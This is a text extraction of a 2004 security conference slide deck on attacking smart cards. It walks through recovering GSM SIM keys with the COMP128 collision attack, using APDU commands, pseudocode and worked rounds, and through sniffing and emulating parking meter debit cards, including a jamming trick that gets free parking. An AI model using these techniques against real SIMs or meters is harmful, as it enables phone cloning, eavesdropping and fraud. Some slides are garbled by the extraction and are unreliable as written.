743a16b2b7866c2092f08c8b592de9d9.ppt
- Количество слайдов: 87
Smart Card Security: From GSM to Parking Meters David Hulton
Disclaimer § Educational purposes only § Curiosity not fraud § Full disclosure © 2004 Dachb 0 den Labs
Goals § This talk will cover: § Introduction to Smart Cards § Basic Technical Knowledge § Analyzing Proprietary Cards § Asynchronous - GSM SIM Cards § Synchronous - Parking Meter Cards § Breaking it! © 2004 Dachb 0 den Labs
Introduction – What is a Smart Card? § ISO 7816 Standard § Durability Requirements § Pin Layout § Asynchronous Protocols (T=0, T=1) © 2004 Dachb 0 den Labs
Introduction - Durability Requirements § § § § § UV Light Protection X-Ray Protection Surface Profile Contacts Mechanical Strength Electrical Resistance Magnetic Field Static Electricity Bending Resilience … blah …. © 2004 Dachb 0 den Labs
Introduction - Pin Layout 1. 7 mm 2 mm 19. 23 10. 25 mm Vcc Gnd Reset Vpp Clock I/O RS 1 RS 2 © 2004 Dachb 0 den Labs
Introduction - Pin Layout 1. 7 mm 2 mm 19. 23 10. 25 mm Vcc Gnd Reset Vpp Clock I/O RS 1 RS 2 © 2004 Dachb 0 den Labs
Introduction - Protocols § Asynchronous § § T=0 – Half-duplex character transmission T=1 – Half-duplex block transmission Operates at a set baud rate 9600/19200/etc Uses APDU Protocol (Application Protocol Data Unit) § Synchronous § Clock set by reader, used with Memory/Security Cards © 2004 Dachb 0 den Labs
Introduction – Asynchronous Cards § § § All Processor Cards GSM SIM Cards Bank Cards PKI Token Cards Java Cards © 2004 Dachb 0 den Labs
Synchronous Protocol § Use Clk, Rst, & I/O to create 9600 bps connection § Reader sets Rst line high (5 v) § Reader sends APDU Command across I/O a 0 a 4 00 00 Command 02 7 f 20 Len Data (Arguments) § Reader receives response 19 Response © 2004 Dachb 0 den Labs
GSM SIM’s § Rely on COMP 128 Algorithm for security of Ki Phone Challenge GSM Base Station Ki COMP 128 SIM Card Response © 2004 Dachb 0 den Labs
GSM Attacks § COMP 128 Attacks § Narrow pipe collision attack § Side-channel attack § What does it get you? § Clone phones § Eavesdrop § Downsides? § Attacks SIM card § Possibility of killing the card © 2004 Dachb 0 den Labs
Interfacing with the Card § Towitoko CHIPDRIVE micro 130 § Hardware § http: //www. towitoko. de § http: //www. txsystems. com § Software § dsccmd. exe (will be released on dachb 0 den. com soon) § Dumb Mouse § Hardware § http: //cuba. calyx. nl/hip/dumbmouse. html § Software § ftp: //ftp. ccc. de/gsm § Season (? ) § See Phrack 62 -15 © 2004 Dachb 0 den Labs
Protocol § Connect to card § Insert card § Select GSM directory on card § a 0 a 4 00 00 02 7 f 20 § Authenticate with PIN § a 0 20 00 01 08 xx xx ff ff § Run COMP 128 § a 0 88 00 00 10 xx xx xx xx Thankz CCC and ender © 2004 Dachb 0 den Labs
Demonstration? ? Demonstration © 2004 Dachb 0 den Labs
Don’t know the protocol? § Make your own! (Phrack 62 -15) § Buy a Season § http: //www. sdlogic. com § Beware, could get sued by Primestar/Direct. TV © 2004 Dachb 0 den Labs
Narrow Pipe Collision Attack § How to do it? § Ian Goldberg found a narrow pipe in COMP 128 which attacks the second round (2 -R Attack) § Collisions in COMP 128 responses reveal key information § Can crack COMP 128 in ~ 115, 000 queries © 2004 Dachb 0 den Labs
GSM Precautions § New SIM Cards § Card will die after 65, 535 queries § Optimizations in COMP 128 attack allow cracking in < 20, 000 queries © 2004 Dachb 0 den Labs
COMP 128(challenge) Initialization: For i = 0 … 15 x[i + 16] = challenge[i] Scrambling: For i = 1 … 8 For j = 0 … 15 x[j] = key[j] For j = 0 … 4 For k = 0 … 2 j For l = 0 … 24 -j m = l + k * 25 -j n = m + 24 -j y = (x[m] + 2 * x[n]) % 29 -j z = (2 * x[m] + x[n]) % 29 -j x[m] = table[j][y] x[n] = table[j][z] For j = 0 … 31 For k = 0 … 3 bit[4 * j + k] = (x[j] >> (3 - k)) & 1 if(i < 8) For j = 0 … 15 x[j + 16] = 0 For k = 0 … 7 nb = ((8 * j + k) * 17) % 128 x[j + 16] |= bit[nb] << (7 - k) Output: For i = 0 … 3 output[i] = (x[2 * i] << 4) | x[2 * i + 1] For i = 0 … 5 output[4 + i] = (x[2 * i + 18] <<6) | (x[2 * i + 19] <<2) | (x[2 * i + 20] >>2) output[10] = (x[30] << 6) | (x[31] << 2) output[11] = 0 © 2004 Dachb 0 den Labs
COMP 128(challenge) Initialization: For i = 0 … 15 x[i + 16] = challenge[i] For j = 0 … 31 For k = 0 … 3 bit[4 * j + k] = (x[j] >> (3 - k)) & 1 if(i < 8) For j = 0 … 15 x[j + 16] = 0 For k = 0 … 7 nb = ((8 * j + k) * 17) % 128 the NSA 16] |= bit[nb] << (7 - k) x[j + Scrambling: For i = 1 … 8 For j = 0 … 15 x[j] = key[j] Complements of For j = 0 … 4 Output: For k = 0 … 2 j For i = 0 … 3 For l = 0 … 24 -j output[i] = (x[2 * i] << 4) | x[2 * i + 1] m = l + k * 25 -j For i = 0 … 5 n = m + 24 -j output[4 + i] = (x[2 * i + 18] <<6) | y = (x[m] + 2 * x[n]) % 29 -j (x[2 * i + 19] <<2) | (x[2 * i + 20] >>2) z = (2 * x[m] + x[n]) % 29 -j output[10] = (x[30] << 6) | (x[31] << 2) x[m] = table[j][y] x[n] = table[j][z] output[11] = 0 © 2004 Dachb 0 den Labs
COMP 128(challenge) Initialization: For i = 0 … 15 x[i + 16] = challenge[i] For j = 0 … 31 For k = 0 … 3 bit[4 * j + k] = (x[j] >> (3 - k)) & 1 if(i < 8) For j = 0 … 15 x[j + 16] = 0 For k = 0 … 7 nb = ((8 * j + k) * 17) % 128 the NSA 16] |= bit[nb] << (7 - k) x[j + Scrambling: For i = 1 … 8 For j = 0 … 15 x[j] = key[j] Complements of For j = 0 … 4 (Thanks NSA) Output: For k = 0 … 2 j For i = 0 … 3 For l = 0 … 24 -j output[i] = (x[2 * i] << 4) | x[2 * i + 1] m = l + k * 25 -j For i = 0 … 5 n = m + 24 -j output[4 + i] = (x[2 * i + 18] <<6) | y = (x[m] + 2 * x[n]) % 29 -j (x[2 * i + 19] <<2) | (x[2 * i + 20] >>2) z = (2 * x[m] + x[n]) % 29 -j output[10] = (x[30] << 6) | (x[31] << 2) x[m] = table[j][y] x[n] = table[j][z] output[11] = 0 © 2004 Dachb 0 den Labs
COMP 128 For Dummies COMP 128(Challenge) © 2004 Dachb 0 den Labs
COMP 128 For Dummies COMP 128(Challenge) X[32] 0 -15 Ki © 2004 Dachb 0 den Labs
COMP 128 For Dummies COMP 128(Challenge) 16 -31 X[32] 0 -15 Ki © 2004 Dachb 0 den Labs
COMP 128 For Dummies COMP 128(Challenge) 16 -31 X[32] 0 -15 Ki FFT_Bit_Reduction() © 2004 Dachb 0 den Labs
COMP 128 - FFT Bit Reduction key = all zeros challenge = all zeros x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 00 00 00 00 00 00 00 00 © 2004 Dachb 0 den Labs
COMP 128 - R 1 Round 1 x[32] = 8 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 66 00 00 00 00 00 00 00 00 © 2004 Dachb 0 den Labs
COMP 128 - R 1 Round 1 x[32] = 8 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 66 66 00 00 00 00 00 00 00 © 2004 Dachb 0 den Labs
COMP 128 - R 1 Round 1 x[32] = 8 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 66 66 66 66 66 66 66 66 © 2004 Dachb 0 den Labs
COMP 128 - R 2 Round 2 x[32] = 7 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 1 c 66 66 66 66 66 66 66 66 © 2004 Dachb 0 den Labs
COMP 128 - R 2 Round 2 x[32] = 7 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 1 c 1 c 66 66 66 66 66 66 66 © 2004 Dachb 0 den Labs
COMP 128 - R 2 Round 2 x[32] = 7 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 1 c 1 c 1 c 1 c 66 66 66 66 © 2004 Dachb 0 den Labs
COMP 128 - R 2 Round 2 x[32] = 7 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 1 c 1 c 1 c 1 c 1 c 1 c 1 c 1 c © 2004 Dachb 0 den Labs
COMP 128 - R 3 Round 3 x[32] = 6 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 37 37 1 c 1 c 1 c 1 c 1 c 1 c © 2004 Dachb 0 den Labs
COMP 128 - R 3 Round 3 x[32] = 6 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 37 37 37 37 37 37 37 37 © 2004 Dachb 0 den Labs
COMP 128 - R 4 Round 4 x[32] = 5 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 08 08 37 37 37 37 37 37 37 © 2004 Dachb 0 den Labs
COMP 128 - R 4 Round 4 x[32] = 5 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 08 08 08 08 08 08 08 08 © 2004 Dachb 0 den Labs
COMP 128 - R 5 Round 5 x[32] = 4 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 05 05 08 08 08 08 08 08 08 08 © 2004 Dachb 0 den Labs
COMP 128 - R 5 Round 5 x[32] = 4 bits 0 1 2 3 4 5 6 7 8 9 a b c d e f 05 05 05 05 05 05 05 05 © 2004 Dachb 0 den Labs
COMP 128 For Dummies COMP 128(Challenge) 16 -31 X[32] 0 -15 Ki FFT_Bit_Reduction() Shift_Bytes() © 2004 Dachb 0 den Labs
COMP 128 For Dummies COMP 128(Challenge) 16 -31 X[32] 0 -15 Ki FFT_Bit_Reduction() Shift_Bytes() Repeat 7 Times © 2004 Dachb 0 den Labs
COMP 128 For Dummies COMP 128(Challenge) X[32] 0 -15 Ki FFT_Bit_Reduction() Reduce_Bytes() Shift_Bytes() Repeat 7 Times © 2004 Dachb 0 den Labs
COMP 128 For Dummies COMP 128(Challenge) X[32] 0 -15 Ki Return Null-pad_10_bits!() Reduce_Bytes() FFT_Bit_Reduction() Shift_Bytes() Repeat 7 Times © 2004 Dachb 0 den Labs
COMP 128 - Baseline 2 -R Attack key = 0123456789 abcdeffedcba 9876543210 challenge = 230000…… 550000…… x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10 23 00 00 55 00 00 We first look for challenges that have the same responses (collisions) © 2004 Dachb 0 den Labs
COMP 128 - Baseline 2 -R Attack key = 0123456789 abcdeffedcba 9876543210 challenge = 230000…… 550000…… x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10 23 00 00 55 00 00 key = 0123456789 abcdeffedcba 9876543210 challenge = 0 d 0000……e 70000…… x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10 0 d 00 00 e 7 00 00 © 2004 Dachb 0 den Labs
COMP 128 - Baseline 2 -R Attack Round 1 x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 0 e 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10 d 3 00 00 55 00 00 x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f df 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10 bc 00 00 e 7 00 00 © 2004 Dachb 0 den Labs
COMP 128 - Baseline 2 -R Attack Round 1 x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 0 e 2 f 01 e 8 cc 44 e 4 17 d 0 dc ba 98 76 54 32 10 d 3 31 96 c 6 35 4 a a 7 e 2 f 3 00 00 x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f df 2 f 01 e 8 cc 44 e 4 17 2 e dc ba 98 76 54 32 10 bc 31 96 c 6 35 4 a a 7 e 2 21 00 00 © 2004 Dachb 0 den Labs
COMP 128 - Baseline 2 -R Attack Round 1 x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 0 e 2 f 01 e 8 cc 44 e 4 17 d 0 7 f 8 f 90 3 a c 9 0 d 6 d d 3 31 96 c 6 35 4 a a 7 e 2 f 3 ea e 3 1 a 18 d 9 57 fc x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f df 2 f 01 e 8 cc 44 e 4 17 2 e 7 f 8 f 90 3 a c 9 0 d 6 d bc 31 96 c 6 35 4 a a 7 e 2 21 ea e 3 1 a 18 d 9 57 fc © 2004 Dachb 0 den Labs
COMP 128 - Baseline 2 -R Attack Round 2 x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 37 2 f 01 e 8 cc 44 e 4 17 60 7 f 8 f 90 3 a c 9 0 d 6 d d 3 31 96 c 6 35 4 a a 7 e 2 f 3 ea e 3 1 a 18 d 9 57 fc x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 37 2 f 01 e 8 cc 44 e 4 17 60 7 f 8 f 90 3 a c 9 0 d 6 d bc 31 96 c 6 35 4 a a 7 e 2 21 ea e 3 1 a 18 d 9 57 fc © 2004 Dachb 0 den Labs
COMP 128 - Baseline 2 -R Attack Round 2 x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 37 5 e 05 27 5 a 1 f 7 a 11 60 36 6 b 39 31 42 69 28 7 a 31 96 c 6 35 4 a a 7 e 2 64 ea e 3 1 a 18 d 9 57 fc Collision! x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 37 5 e 05 27 5 a 1 f 7 a 11 60 36 6 b 39 31 42 69 28 7 a 31 96 c 6 35 4 a a 7 e 2 64 ea e 3 1 a 18 d 9 57 fc © 2004 Dachb 0 den Labs
COMP 128 § What can we do with this Collision? § If we get a collision from COMP 128 with those 2 challenges, we know that 2 bytes of the key must be those 2 values If COMP 128(chall = 230000… 550000…) == COMP 128(chall = 0 d 0000…e 70000…) Then we know: key = 01 xxxxxxxxfexxxxxxx © 2004 Dachb 0 den Labs
COMP 128 § What can we do with this Collision? § If we get a collision from COMP 128 with those 2 challenges, we know that 2 bytes of the key must be those 2 values If COMP 128(chall = 230000… 550000…) == COMP 128(chall = 0 d 0000…e 70000…) Then we know: key = 01 xxxxxxxxfexxxxxxx Repeat 8 times until full key is recovered © 2004 Dachb 0 den Labs
COMP 128 Optimizations § This baseline attack takes 115, 000 tries § Card will die after 65, 535 requests § How do we get the number down? § Precompute all collisions § Find the challenges that collide the most § Try them first § Still not fast enough? © 2004 Dachb 0 den Labs
COMP 128 - 3 -R Attack x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 01 00 00 00 xx 00 00 00 fe 00 00 xx 00 00 00 Once we know bytes 0 and 8 of the key, we can attack the 3 rd round -virtually 1 byte at a time These require a bit of pre-computation but only require ~ 768 tries © 2004 Dachb 0 den Labs
COMP 128 - 3 -R Attack x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 01 00 00 00 89 00 00 00 fe 00 00 00 xx 00 00 00 xx 00 00 00 © 2004 Dachb 0 den Labs
COMP 128 - 4 -R Attack x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 01 00 xx 00 89 00 00 00 fe 00 00 00 76 00 00 00 xx 00 xx 00 Same for the 4 th round © 2004 Dachb 0 den Labs
COMP 128 - 4 -R Attack x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 01 00 45 00 89 00 cd 00 fe 00 ba 00 76 00 xx 00 xx 00 xx 00 © 2004 Dachb 0 den Labs
COMP 128 - 5 -R Attack x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 01 xx 45 00 89 00 cd 00 fe 00 ba 00 76 00 32 00 xx xx xx xx And the 5 th © 2004 Dachb 0 den Labs
COMP 128 - 5 -R Attack x[32] = 0 1 2 3 4 5 6 7 8 9 a b c d e f 01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 xx xx xx xx xx © 2004 Dachb 0 den Labs
COMP 128 - 5 -R Attack Key = 01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10 0 wned (In < 20 thousand tries) © 2004 Dachb 0 den Labs
COMP 128 Attack § Works on most GSM carriers in the US § T-Mobile § Cingular § Etc § New attack takes around 15 minutes w precomputed dictionary § SIM card emulators can be purchased online or emulated with a $2 PIC § Open Source tools will be released shortly § SIM SCAN v 2 implements this (thx Dejan Kaljevic) © 2004 Dachb 0 den Labs
Parking Meters? WTF is a Parking Meter? Smart Card Coin Input Coin Output © 2004 Dachb 0 den Labs
PARKING METER DEBIT CARD 1. Insert debit card into meter in direction shown by arrow. 2. The Meter will increment in 6 min. segments. 3. When desired time is displayed, remove card. DID YOU BUY TOO MUCH TIME? TO OBTAIN EXTRA TIME REFUND * Insert the same debit card that was used to purchase time on the meter. Full 6 minute increments will be credited to the card. Increments of less than 6 minutes will be lost. © 2004 Dachb 0 den Labs
Introduction – Synchronous Cards § § § Memory Cards Kinkos Cards Internet Café Cards Cash Cards Parking Meters © 2004 Dachb 0 den Labs
Synchronous Protocol § Also uses Clk, Rst, and I/O § Clk sets the transfer speed § When Clk high (5 v) read from I/O, write when it’s low (Gnd) § Reader sets Rst line high (5 v) § After Rst drops, Card starts sending bits to Reader for each high Clk Rst Clk I/O Bit 0 = 1 Bit 1 = 0 © 2004 Dachb 0 den Labs
Parking Meter Cards § Similar to the SLE 4406 (European Telecom Card) § Implements a one-way counter § Bits are set by a programmer § Fuse is blown § Bits will only go 1 -> 0 © 2004 Dachb 0 den Labs
Demonstration? ? Demonstration © 2004 Dachb 0 den Labs
Parking Meter Card – Memory Dump 98 FF 00 00 FF FF FE FF FF 14 FF 00 00 FF FF FF FF 3 C FF 00 00 FF FF 92 FF 00 00 00 F 8 FF FF FF 00 00 00 FF FF 46 FF 00 00 00 FF FF B 1 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 FF FF FF FF 00 00 80 FF FF FF FF 00 00 FF FF © 2004 Dachb 0 den Labs
Parking Meter Card – Memory Dump 98 FF 00 00 FF FF FE FF FF 14 FF 00 00 FF FF FF FF 3 C FF 00 00 FF FF 92 FF 00 00 00 F 8 FF FF FF 00 00 00 FF FF 46 FF 00 00 00 FF FF B 1 00 00 FF FF ATR (Answer to Reset) Credit Bits Refund Buffer Bits FF 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 FF FF 00 00 80 FF FF FF FF 00 00 FF FF Serial Number Refund Bits © 2004 Dachb 0 den Labs
Parking Meter Card – Memory Dump 98 FF 00 00 FF FF FE FF FF 14 FF 00 00 FF FF FF FF 3 C FF 00 00 FF FF 92 FF 00 00 00 F 8 FF FF FF 1 bit = $0. 10 00 FF 00 00 00 FF FF 46 FF 00 00 00 FF FF B 1 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 FF FF FF FF 00 00 80 FF FF FF FF 00 00 FF FF 6 bits + 7 bits = $1. 30 © 2004 Dachb 0 den Labs
Parking Meter Card - Tapping § Reverse Engineering the Protocol § Tap the connection § Log the data § Decode protocol © 2004 Dachb 0 den Labs
Tapping the Connection § Make a fake smart card § Plastic card § Copper tape § Get a smart card socket § Rip it out of a smart card reader § Connect the two with a cable § Old floppy/ide cables work good § Tap the connection § Vampire clips § Run signal through 10 k resistors to a buffer § Connect buffer to a parallel port © 2004 Dachb 0 den Labs
ASCII Art Parallel Port D 10 - Ack - I 6 o-------------, | D 11 - Busy - I 7 o---------------, | | D 12 - Paper Out - I 5 o-----------------, | | | D 13 - Select - I 4 o-------------------, | | D 25 - Gnd o-----, | | | | External 5 V (USB) | | | | | 5 V o---------, | | | 0 V o-------*-----|---*----------|---|-----, | | | , --==--==--==--==--==--, | __+__ | |_ 20 19 18 17 16 15 14 13 12 11 | | ///// | | ] 74 HCT 541 N || | |' 1 2 3 4 5 6 7 8 9 10 | | | '--==--==--==--==--==--' | | | | '---*---* | | '-----' '-----*-----, , ---|---* | | | , -|---* | | Smart Card | | | *---|------, , ----------, | | | | *----, | , -------|--* Vcc | Gnd *--|-* | | | , -, | |----------| | | | | , -----|--* Reset | Vpp |||||||| || | | |----------| | | |_| |_| | | , ---|--* Clock | I/O *--|-* | |r 1 |r 2 |r 3 |r 4 | | |----------| | | |10 k|10 k | | | , -|--* RF 1 | RF 2 *--|---* | | | '----------' | | | '---*---*---' | | *-|-------------|-|-|-----------' | | *-|-|-------------|-|-|------------' |||| | | Smart Card Reader ||| | | , ----------, | | | '-------|--* Vcc | Gnd *--|-' | | |----------| | | '-----|--* Reset | Vpp | || | | |----------| | | '---|--* Clock | I/O *--|---' | | |----------| | '-|--* RF 1 | RF 2 *--|-----' '----------' Sneak peek of possible future Phrack article © 2004 Dachb 0 den Labs
Logging the Data § Sniffing connection (synclog. c) § Poll parallel port I/O § If I/O lines change, log it to memory § When finished, write bits to log file © 2004 Dachb 0 den Labs
Logging the Data #include
Decoding Protocol § Convert to bytes (analyze. c) § Push a bit into our buffer every time the clock is high § When reset is high, reset bit counter and print buffer § Time graph analysis (timing. pl) § Plot 2 -D graph of communication (thx prole!) § Uses GD to plot a large jpg © 2004 Dachb 0 den Labs
Demonstration? ? Demonstration © 2004 Dachb 0 den Labs
Protocol Dumps Memory Dump: 00011001001010001111001111000100100100000110001010001101 111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000111111111111111111111111111111111111111111111111111111111 Write to Card: 00011001001010001111001111000100100100000110001010001101 11111111011110101101 © 2004 Dachb 0 den Labs
Timing Graph Analysis - Deduct Rst Clk I/O Rsv 1 Then issues Write to Card Command © 2004 Dachb 0 den Labs
Timing Graph Analysis - Refund Rst Clk I/O Rsv 1 Then issues Write to Card Command Rst Clk I/O Rsv 1 1 Credit 2 Credits Refunds 2 Credits to Parking Meter Card © 2004 Dachb 0 den Labs
Emulate Protocol § Code a PIC to speak the protocol § See Phrack 48 -11 for hints § PIC 16 F 84 A § Supply RC or external clock and connect proper pins § Tip: Tie clock line to interrupt § Full code & schematics may be released in Phrack 63 § See me for more detailz © 2004 Dachb 0 den Labs
BRUTE FORCE !!!!! § Impatient? § § Fold a business card in half Insert into meter’s slot so it’s difficult to remove Meter will go out of order after ~ 90 seconds Out of order meters are free © 2004 Dachb 0 den Labs
Parking Meters Owned © 2004 Dachb 0 den Labs
Other Security Memory Cards § SLE 4442/SLE 4428 § Implement a PIN for Write Access § Similar to GSM SIM Cards § 3 Strikes You’re Out! § University Soda Machines § § Each card has different PIN Reader performs voodoo magic to determine PIN Rewrites credits on card (thx Michael Stegan) § Most of the time § Same PIN on every card © 2004 Dachb 0 den Labs
Conclusions § David Hulton § h 1 kari@dachb 0 den. com § http: //www. dachb 0 den. com § References § § § Phrack 48 10/11 Phrack 62 15 ISO 7816 -1/2/3 http: //www. cs. berkeley. edu/isaac/gsm. html http: //www. towitoko. de http: //www. sdlogic. com © 2004 Dachb 0 den Labs
Conclusions / Shameful Plugz § Come to Toor. Con! § September 24 th-26 th, 2004 § http: //www. toorcon. org § Celebrating 20 Years After Big Brother § Come to Shmoo. Con! § Super Bowl Weekend, 2005 § http: //www. shmoocon. com § No moose, (they swear). § Come to Layer. One! § http: //www. layerone. info © 2004 Dachb 0 den Labs
Questions ? Suggestions ? § Got any good cards to look at? § Anything I missed? (mercy!) © 2004 Dachb 0 den Labs